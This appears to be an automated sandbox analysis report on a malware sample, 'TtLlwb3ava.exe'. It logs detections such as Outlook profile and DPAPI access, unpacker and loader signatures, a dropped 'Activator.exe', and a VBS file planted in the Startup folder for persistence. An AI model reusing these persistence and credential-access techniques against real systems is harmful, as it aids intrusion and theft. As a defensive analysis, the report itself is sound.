                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: TtLlwb3ava.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: TtLlwb3ava.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: TtLlwb3ava.exeStatic file information: File size 1882112 > 1048576
                    Source: TtLlwb3ava.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1cae00
                    Source: TtLlwb3ava.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.TtLlwb3ava.exe.3a67790.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.TtLlwb3ava.exe.5630000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.5380000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TtLlwb3ava.exe.5380000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1246431997.0000000005380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_01034EA4 push esi; retf 0_2_01034EA5
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0532D629 push ebx; retf 0_2_0532D62A
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_0532D208 pushfd ; retf 0_2_0532D451
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05339AC5 push esi; iretd 0_2_05339AC6
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_055B5D5B push eax; retf 0_2_055B5D61
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_055B5D58 pushad ; retf 0_2_055B5D59
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 0_2_05616902 push ebp; retf 0_2_05616908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A8A5B0 push ds; retf 2_2_04A8A642
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A8A6DB push ds; retf 2_2_04A8A6E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A8A650 push ds; retf 2_2_04A8A6DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A89259 push cs; retf 2_2_04A8925A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_04A8925B push cs; retf 2_2_04A89262
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_018C4EA4 push esi; retf 10_2_018C4EA5
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E4D629 push ebx; retf 10_2_05E4D62A
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E4D208 pushfd ; retf 10_2_05E4D451
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_05E79AC5 push esi; iretd 10_2_05E79AC6
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060FB375 push edx; ret 10_2_060FB393
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060FB395 push edx; ret 10_2_060FB39B
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060FAEFF push edi; ret 10_2_060FAF01
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060F5D5B push eax; retf 10_2_060F5D61
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060F5D58 pushad ; retf 10_2_060F5D59
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_060F1DCB push es; iretd 10_2_060F1DCC
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 10_2_06156902 push ebp; retf 10_2_06156908
                    Source: TtLlwb3ava.exeStatic PE information: section name: .text entropy: 7.513094425002416
                    Source: Activator.exe.0.drStatic PE information: section name: .text entropy: 7.513094425002416
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeFile created: C:\Users\user\AppData\Roaming\Activator.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbsJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbsJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
